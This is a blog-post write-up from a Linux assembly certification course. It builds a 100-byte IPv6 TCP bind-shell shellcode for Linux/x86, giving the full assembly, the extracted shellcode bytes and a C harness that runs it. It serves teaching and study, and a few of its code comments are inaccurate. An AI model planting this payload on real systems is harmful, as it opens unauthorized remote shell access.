<!DOCTYPE html>
<html lang="en">

<head><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link href="https://fonts.googleapis.com/css?family=Merriweather:300|Raleway:400,700" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/style.css">
<title>SHELL_BIND_TCP_IPV6 – LINUX/X86</title>
<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>SHELL_BIND_TCP_IPV6 – LINUX/X86 | IAMROOT</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="SHELL_BIND_TCP_IPV6 – LINUX/X86" />
<meta name="author" content="Kartik Durg" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification Student ID: SLAE-1233 Assignment: 1 Github: Kartik Durg" />
<meta property="og:description" content="This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification Student ID: SLAE-1233 Assignment: 1 Github: Kartik Durg" />
<link rel="canonical" href="http://localhost:4000/2018/07/17/0x1-shell-bind-tcp-ipv6-linux-x86.html" />
<meta property="og:url" content="http://localhost:4000/2018/07/17/0x1-shell-bind-tcp-ipv6-linux-x86.html" />
<meta property="og:site_name" content="IAMROOT" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-07-17T00:00:00+05:30" />
<script type="application/ld+json">
{"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2018/07/17/0x1-shell-bind-tcp-ipv6-linux-x86.html"},"author":{"@type":"Person","name":"Kartik Durg"},"description":"This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification Student ID: SLAE-1233 Assignment: 1 Github: Kartik Durg","headline":"SHELL_BIND_TCP_IPV6 – LINUX/X86","dateModified":"2018-07-17T00:00:00+05:30","datePublished":"2018-07-17T00:00:00+05:30","@type":"BlogPosting","url":"http://localhost:4000/2018/07/17/0x1-shell-bind-tcp-ipv6-linux-x86.html","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


<head>

</head></head>

<body>
  <main class="container">
    <section class="about">
      <a href="/"><img src="/assets/portfolio.jpg" alt="Kartik Durg"></a>
      <h2 id="title">
        <a href="/">Kartik Durg</a>
      </h2>
      <p class="tagline">Red Team Research @McAfee</p>
      <ul class="social"><a href="https://github.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-github-circled"></i>
          </li>
        </a><a href="https://www.linkedin.com/in/kartikdurg" target="_blank">
          <li>
            <i class="icon-linkedin-squared"></i>
          </li>
        </a><a href="https://twitter.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-twitter-squared"></i>
          </li>
        </a></ul><nav class="navigation">
        <ul>
          
          <li>
            <a href="/index.html">Home</a>
          </li>
          
        </ul>
      </nav><p>&copy;
        2020</p><div>
        <p>Dark Mode
          <i class="icon-moon"></i>
          <label class="switch">
            <input type="checkbox" id="dark-mode-toggle">
            <span class="slider round" onclick="toggleDarkMode()"></span>
          </label>
        </p>
      </div>
      <script type="text/javascript" src="/assets/js/darkmode.js"></script></section>
    <section class="content">
      <div class="post-container">
  <a class="post-link" href="/2018/07/17/0x1-shell-bind-tcp-ipv6-linux-x86.html">
    <h2 class="post-title">SHELL_BIND_TCP_IPV6 – LINUX/X86</h2>
  </a>
  <div class="post-meta">
    <div class="post-date"><i class="icon-calendar"></i>Jul 17, 2018</div></div>
  <div class="post">
    <p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification</p>
<ul>
  <li>Student ID: SLAE-1233</li>
  <li>Assignment: 1</li>
  <li>Github: <a href="https://github.com/kartikdurg">Kartik Durg</a></li>
</ul>

<hr />

<p>The objective of this assignment is to create a Shell_bind_TCP in Linux/x86 Assembly for which, port number should be easily configurable.</p>

<p>To solve this challenge I found following resources very help full:</p>

<ol>
  <li><a href="http://syscalls.kernelgrok.com/">Syscalls</a></li>
  <li><a href="https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/in.h">UAPI/in.h</a></li>
  <li><a href="https://www.3dbrew.org/wiki/Socket_Services">Socket_Services</a></li>
  <li><a href="http://osr600doc.xinuos.com/en/SDK_netapi/sockC.TheIPv6sockaddrstructure.html">The IPv6 sock addr structure</a></li>
  <li><a href="http://www.qnx.com/developers/docs/6.5.0/index.jsp?topic=%2Fcom.qnx.doc.neutrino_lib_ref%2Fi%2Finet6_proto.html">inet6_proto</a></li>
</ol>

<p>Before going further, I would like to point out few basic rules a shellcode should obey:</p>

<ul>
  <li>Null free!!</li>
  <li>A shellcode should be as small as possible because, you may never know the size of memory inside which the shellcode will be inject.</li>
  <li>Register aware – clean up the registers before using them, so that you can reuse those registers and save few bytes to achieve small size shellcode.</li>
  <li>Also, no long jumps.</li>
</ul>

<p>Here is how a <code class="language-plaintext highlighter-rouge">Shell_bind_TCP</code> for <code class="language-plaintext highlighter-rouge">IPV6</code> looks like in C:
___
<img src="/media/1-tcp-bind-shell-1.jpg" alt="Shell_bind_TCP_IPV6" /></p>

<hr />

<p>A quick breakdown of above shell developed in C:</p>

<ul>
  <li>Create socket</li>
  <li>Bind socket to a local port</li>
  <li>Listen for incoming connections</li>
  <li>Accept incoming connection</li>
  <li>Redirect <code class="language-plaintext highlighter-rouge">STDIN</code>,<code class="language-plaintext highlighter-rouge">STDOUT</code> and <code class="language-plaintext highlighter-rouge">STDERR</code> to newly created socket from client.</li>
  <li>Spawn the shell.</li>
</ul>

<p>Now lets create all the above socket programming module’s in <code class="language-plaintext highlighter-rouge">assembly</code> by making use of <code class="language-plaintext highlighter-rouge">syscalls</code>. To achieve this, we need to make use of three registers:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">0x66</code> is the number of <code class="language-plaintext highlighter-rouge">socketcall()</code> as defined in the linux headers.This number should be stored in <code class="language-plaintext highlighter-rouge">EAX</code> register.</li>
  <li><code class="language-plaintext highlighter-rouge">/usr/include/linux/net.h</code> contains the call id of socket functions. Store the call id of a socket that you want to use inside the <code class="language-plaintext highlighter-rouge">EBX</code> register. ( I will be using SYS_BIND, SYS_LISTEN and SYS_ACCEPT )</li>
  <li><code class="language-plaintext highlighter-rouge">ECX</code> should contain pointer to the arguments.</li>
</ul>

<hr />
<p><img src="/media/1-tcp-bind-shell-2.jpg" alt="Shell_bind_TCP_IPV6" /></p>

<hr />

<p>Now that we are aware of basic rules, registers and socket calls to be used for writing our shellcode, lets jump into the assembly:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start
section .text

_start:
;IPV6 socket creation 
;int socketcall(int call, unsigned long *args);
;sockfd = socket(int socket_family, int socket_type, int protocol);
push byte 0x66              ;socketcall()
pop eax                     ;EAX=0x2

xor ebx,ebx                 ; zero out ebx

push 0x6                    ; IPPROTO_TCP=6
push 0x1                    ; socket_type=SOCK_STREAM (0x1)
push 0xa                    ; AF_INET6
inc ebx                     ; Define SYS_socket = 1
mov ecx,esp                 ; save pointer (ESP) to socket() args (ECX)
int 0x80
xchg esi,eax                ; socfd stored in esi
xor eax,eax

 ;Bind
;int socketcall(int call, unsigned long *args);
;bind(host_sockfd, (struct sockaddr*) &amp;host_addr, sizeof(host_addr)); 
push DWORD eax              ;x4 dword ipv6 loopback  | EAX contains 0
push DWORD eax
push DWORD eax
push DWORD eax
push eax                    ;sin6_addr = in6addr_any | in6addr_any=::
push WORD 0x5c11            ;sin6_port=4444 | 0x5c11 | Configurable |
push WORD 0x0a              ;AF_INET6
mov ecx,esp                 ;ECX holds pointer to struct sockaddr_in6
push byte 0x1c              ;sizeof(sockaddr_in6) | sockaddr_in6 = 28
push ecx                    ;pointer to host_sockfd
push esi                    ;host_sockfd
mov ecx,esp                 ;ECX points to args
inc ebx                     ;EBX = 0x2 | #define SYS_BIND 2
push byte 0x66              ;socketcall()
pop eax
int 80h

;Listen
;int socketcall(int call, unsigned long *args);
;int listen(int host_sockfd, int backlog);
push ebx                    ;EBX=2 | backlog=2
push esi                    ;poiter to host_sockfd
mov ecx,esp                 ;ECX points to args
inc ebx
inc ebx                     ;EBX = 0x4| #define SYS_LISTEN 4
push byte 0x66              ;socketcall()
pop eax
int 80h

;Accept
;int socketcall(int call, unsigned long *args);
;accept(int sockfd, NULL, NULL);
cdq                         ;EDX = 0x0 | Saves a byte
push edx                    ;Push NULL
push edx                    ;Push NULL
push esi                    ;Push host_sockfd
mov ecx,esp                 ;ECX points to args
inc ebx                     ;EBX = 0x5 | #define SYS_ACCEPT 5
push byte 0x66              ;socketcall()
pop eax
int 80h

xchg ebx,eax                ;save client_sockfd

push byte 0x2               ;push 0x2 on stack
pop ecx                     ;ECX = 2

;dup2() to redirect stdin(0), stdout(1) and stderr(2)
loop:
push byte 0x3f              ;dup2()
pop eax                     ;EAX = 0x3f
int 0x80                    ;exec sys_dup2
dec ecx                     ;decrement counter
jns loop                    ;if SF not set ==&gt; keep jumping

;execve(/bin//sh)
xor ecx,ecx                 ;clear ECX
push ecx                    ;Push NULL
push byte 0x0b              ;execve() sys call number
pop eax                     ;EAX=0x2 | execve()
push 0x68732f2f             ;(1)/bin//sh
push 0x6e69622f             ;(2)/bin//sh
mov ebx,esp                 ;EBX pointing to "/bin//sh"
int 0x80                    ;Calling Interrupt for sys call
</code></pre></div></div>

<p>As you can see, we have <code class="language-plaintext highlighter-rouge">EAX: 0x66 , EBX: 0x1, ECX:{10,1,0}</code> that will issue a socketcall of type <code class="language-plaintext highlighter-rouge">SYS_SOCKET</code>. Similarly <code class="language-plaintext highlighter-rouge">0x2</code> for <code class="language-plaintext highlighter-rouge">SYS_BIND</code>, <code class="language-plaintext highlighter-rouge">0x4</code> for <code class="language-plaintext highlighter-rouge">SYS_LISTEN</code> and <code class="language-plaintext highlighter-rouge">0x5</code> for <code class="language-plaintext highlighter-rouge">SYS_ACCEPT</code>.</p>

<p>Moving further to next instruction, <code class="language-plaintext highlighter-rouge">IPPROTO_TCP</code> is defined by using push <code class="language-plaintext highlighter-rouge">0x6</code>, <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> by using push <code class="language-plaintext highlighter-rouge">0x1</code> and <code class="language-plaintext highlighter-rouge">AF_INET6</code> by using push <code class="language-plaintext highlighter-rouge">0xa</code>. I have used <code class="language-plaintext highlighter-rouge">IPPROTO_TCP</code> because it supports both <code class="language-plaintext highlighter-rouge">AF_INET</code> and <code class="language-plaintext highlighter-rouge">AF_INET6</code> sockets.</p>

<hr />
<p><img src="/media/1-tcp-bind-shell-3.jpg" alt="Shell_bind_TCP_IPV6" /></p>

<hr />

<p>Before calling <code class="language-plaintext highlighter-rouge">bind()</code>, you can notice that <code class="language-plaintext highlighter-rouge">sin6_addr</code> is set to <code class="language-plaintext highlighter-rouge">0</code> by using push <code class="language-plaintext highlighter-rouge">DWORD EAX</code> and then setting up <code class="language-plaintext highlighter-rouge">::1(localhost)</code>, port <code class="language-plaintext highlighter-rouge">4444</code> as below:</p>

<ul>
  <li>PUSH <code class="language-plaintext highlighter-rouge">EAX</code></li>
  <li>PUSH <code class="language-plaintext highlighter-rouge">0x5c11 (Configurable)</code></li>
</ul>

<h3 id="compiling-and-connecting-to-shellcode">COMPILING AND CONNECTING TO SHELLCODE:</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>==&gt; nasm -f elf32 -o shell_bind_tcp_ipv6.o shell_bind_tcp_ipv6.asm
==&gt; ld -o shell_bind_tcp_ipv6 shell_bind_tcp_ipv6.o
==&gt; lsof | grep 2863 | grep -i listen
# Connect to 127.0.0.1:4444
==&gt; nc -nv 127.0.0.1 4444
</code></pre></div></div>

<hr />
<p><img src="/media/1-tcp-bind-shell-4.jpg" alt="Shell_bind_TCP_IPV6" /></p>

<hr />

<h3 id="extracting-the-shellcode">EXTRACTING THE SHELLCODE:</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump -d shell_bind_tcp_ipv6.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x6a\x66\x58\x31\xdb\x6a\x06\x6a\x01\x6a\x0a\x43\x89\xe1\xcd\x80\x96\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x53\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd\x80\x99\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
</code></pre></div></div>

<h3 id="shellcode-in-c">SHELLCODE IN C:</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include&lt;stdio.h&gt;

unsigned char shellcode[] = \
"\x6a\x66\x58\x31\xdb\x6a\x06\x6a\x01\x6a\x0a\x43\x89\xe1\xcd\x80\x96\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x53\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd\x80\x99\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}
</code></pre></div></div>

<h3 id="testing-the-final-shellcode">TESTING THE FINAL SHELLCODE:</h3>
<hr />
<p><img src="/media/1-tcp-bind-shell-5.jpg" alt="Shell_bind_TCP_IPV6" /></p>

<hr />

<p>Objectives achieved:</p>

<ul>
  <li>Shellcode is null free.</li>
  <li>Only 100 bytes in size.</li>
  <li>Port can be easily configured. ( To configure the port, check the “Configurable” comment in assembly code.)</li>
  <li>Register independent</li>
</ul>

<p>Exploit-DB: <a href="https://www.exploit-db.com/exploits/45080">https://www.exploit-db.com/exploits/45080</a></p>

<p>Link to C-code:
<a href="https://github.com/kartikdurg/SLAE/blob/master/Assignment_0x1/shell_bind_tcp_ipv6.c">shell_bind_tcp_ipv6.c</a></p>

<p>Link to Shellcode.ASM:
<a href="https://github.com/kartikdurg/SLAE/blob/master/Assignment_0x1/shell_bind_tcp_ipv6.asm">shell_bind_tcp_ipv6.asm</a></p>

<p>Link to Shellcode.c:
<a href="https://github.com/kartikdurg/SLAE/blob/master/Assignment_0x1/shell_bind_tcp_ipv6_final.c">shell_bind_tcp_ipv6_final.c</a></p>

<p>Thank you for reading 🙂</p>

<p>– Kartik Durg</p>

  </div><div id="disqus_thread" style="margin-top:25px"></div>
  <script>
    var disqus_config = function () {
      this.page.url = 'http://localhost:4000/2018/07/17/0x1-shell-bind-tcp-ipv6-linux-x86.html';
      this.page.identifier = 'http://localhost:4000/2018/07/17/0x1-shell-bind-tcp-ipv6-linux-x86.html';
    };
    (function () {
      var d = document, s = d.createElement('script');
      s.src = 'https://redteam.disqus.com/embed.js';
      s.setAttribute('data-timestamp', +new Date());
      (d.head || d.body).appendChild(s);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments
      powered by Disqus.</a></noscript></div>

    </section>
  </main><script async src="https://www.googletagmanager.com/gtag/js?id=UA-176694116-1"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());
    gtag('config', 'UA-176694116-1');
  </script>
  <script src="/assets/js/simple-jekyll-search.min.js"></script>
  <script src="/assets/js/search.js"></script>
  
</body>

</html>
